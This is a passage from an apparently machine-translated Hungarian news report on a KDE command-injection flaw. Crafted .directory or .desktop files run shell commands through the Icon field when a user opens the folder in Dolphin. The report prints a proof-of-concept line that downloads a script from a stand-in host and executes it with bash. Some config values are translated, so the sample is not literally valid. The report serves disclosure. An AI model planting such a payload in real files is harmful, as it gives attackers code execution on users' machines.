KDE-ben , amely lehetővé teszi a támadók számára, hogy tetszőleges parancsokat hajtsanak végre, amikor a felhasználó egy speciálisan kialakított „.desktop” és „.directory” fájlokat tartalmazó könyvtárat vagy archívumot tekint meg. A támadás megköveteli, hogy a felhasználó egyszerűen megtekintse a fájlok listáját a Dolphin fájlkezelőben, töltsön le egy rosszindulatú asztali fájlt, vagy húzzon egy parancsikont az asztalra vagy egy dokumentumba. A probléma a könyvtárak jelenlegi kiadásában nyilvánul meg és régebbi verziók, egészen a KDE 4-ig. A biztonsági rés továbbra is fennáll (CVE nincs hozzárendelve).
A problémát a KDesktopFile osztály hibás implementációja okozza, amely az „Icon” változó feldolgozása során megfelelő menekülés nélkül átadja az értéket a KConfigPrivate::expandString() függvénynek, amely végrehajtja a shell speciális karaktereinek kiterjesztését, beleértve a feldolgozást is. a „$(..)” karakterláncokat végrehajtandó parancsként. Ellentétben az XDG specifikáció követelményeivel, megvalósítás shell konstrukciók a beállítások típusának szétválasztása nélkül készülnek, pl. nemcsak az indítandó alkalmazás parancssorának meghatározásakor, hanem az alapértelmezés szerint megjelenített ikonok megadásakor is.
Például támadni küldjön a felhasználónak egy zip archívumot egy „.directory” fájlt tartalmazó könyvtárral, például a következőképpen:
[Desktop Entry] Type=Könyvtár
Ikon[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)
Amikor megpróbálja megtekinteni az archívum tartalmát a Dolphin fájlkezelőben, a https://example.com/FILENAME.sh szkript letöltésre és végrehajtásra kerül.
Forrás: opennet.ru